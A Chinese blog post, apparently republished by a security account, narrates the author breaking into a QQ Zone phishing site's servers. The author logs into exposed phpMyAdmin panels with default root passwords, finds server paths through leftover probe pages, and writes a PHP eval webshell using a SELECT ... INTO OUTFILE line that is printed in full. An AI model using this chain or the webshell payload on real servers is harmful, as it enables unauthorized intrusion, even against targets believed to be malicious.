渗透实战之QQ空间钓鱼网站

2020-01-14 15:22:12 浏览数 (1)

0x00 前言

打开邮箱,发现垃圾箱里躺着一封垃圾邮件

一看就是钓鱼邮件,话不多说,搞他。

没什么技术含量,看看就好。

0x01 渗透过程

第一部分

直接打开链接

除了登陆可以点击,其他超链接都是假的,也太不敬业了。

然后发现地址栏域名和垃圾邮箱里面的给的链接的域名不一样, 是跳转过去的,遂访问初始的域名。

打开一看,phpStudy 探针 2014 页面。

phpstudy 探针 可以测试 数据库连接,试试看弱口令,phpstudy数据库默认账号密码root 测试成功。

然后尝试登陆phpmyadmin

直接访问url /phpMyAdmin/,使用测试成功的弱口令登陆。

数据库里面没什么东西,因为在探针页面知道了物理路径,所有直接写一句话木马,连接之。

select '<?php @eval($_POST[pass]);?>' into outfile 'D:/phpstudy/WWW/test.php';

这个服务器里面啥都没有,只有几个用来跳转连接的php文件, 就回到开头,继续搞qq钓鱼网站的。

第二部分

QQ钓鱼站的后台,找了一圈没找到。

访问一个不存在的文件,提示页面如下图 发现是用UPUPW搭建的,猜测会不会也有phpmyadmin

尝试访问url /phpMyAdmin/ ,返回 404

又尝试访问url /pmd/,成了

尝试弱口令成功登陆

准备写入一句话木马,不知道物理路径。 使用语句

select @@basedir

然后尝试在upupw默认网站路径下写入木马 提示:(Errcode: 2 "No such file or directory") 写入失败,文件夹不存在

然后又尝试了其他路径名,均以失败告终 一筹莫展之际, 想到upupw会不会也有探针页面,会不会没删? 百度之,upupw默认的探针页面是u.php, 尝试访问

得到网站物理路径,然后又是愉快的上蚁剑马连接了。

代码语言:javascript复制
作者:dylan作者博客:dylan‘s blog
本文由公众号HACK学习排版编辑整理

0 人点赞